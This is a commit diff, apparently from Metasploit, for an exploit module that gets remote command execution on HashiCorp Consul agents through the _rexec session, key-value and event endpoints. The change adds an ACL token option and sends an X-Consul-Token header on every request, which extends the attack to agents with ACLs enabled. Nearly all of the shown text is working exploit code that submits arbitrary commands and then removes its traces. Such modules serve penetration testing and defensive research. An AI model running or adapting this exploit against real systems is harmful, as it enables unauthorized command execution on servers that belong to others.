Add support for authorization with X-Consul-Token ACL header.

2018-12-18 16:02:39 +01:00 · 2018-12-18 16:02:39 +01:00 · b80e5715d4
parent 551f8c5e92
commit b80e5715d4
1 changed files with 25 additions and 3 deletions
--- a/modules/exploits/multi/misc/consul_rexec_exec.rb
+++ b/modules/exploits/multi/misc/consul_rexec_exec.rb
@ -38,6 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
      [
        OptString.new('TARGETURI', [true, 'The base path', '/']),
        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
+        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
        Opt::RPORT(8500)
      ])
  end
@ -46,8 +47,11 @@ class MetasploitModule < Msf::Exploit::Remote
  def check
    uri = target_uri.path
    res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(uri, "/v1/agent/self"),
+      'method'  => 'GET',
+      'uri' => normalize_uri(uri, "/v1/agent/self"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
    })
    unless res
      vprint_error 'Connection failed'
@ -74,6 +78,9 @@ class MetasploitModule < Msf::Exploit::Remote
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, 'v1/session/create'),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      },
      'ctype' => 'application/json',
      'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json
    })
@ -91,6 +98,9 @@ class MetasploitModule < Msf::Exploit::Remote
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      },
      'ctype' => 'application/json',
      'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json
    })
@ -102,6 +112,9 @@ class MetasploitModule < Msf::Exploit::Remote
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      },
      'ctype' => 'application/json',
      'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json
    })
@ -113,7 +126,10 @@ class MetasploitModule < Msf::Exploit::Remote
    while not found
      res = send_request_cgi({
        'method' => 'GET',
-        'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms")
+        'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
+        'headers' => {
+          'X-Consul-Token' => datastore['ACL_TOKEN']
+        }
      })
      begin
        data = JSON.parse(res.body)
@ -132,6 +148,9 @@ class MetasploitModule < Msf::Exploit::Remote
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
    })

    if res and not res.code == 200 or res.body == 'false'
@ -141,6 +160,9 @@ class MetasploitModule < Msf::Exploit::Remote
    res = send_request_cgi({
      'method' => 'DELETE',
      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
    })

    if res and not res.code == 200 or res.body == 'false'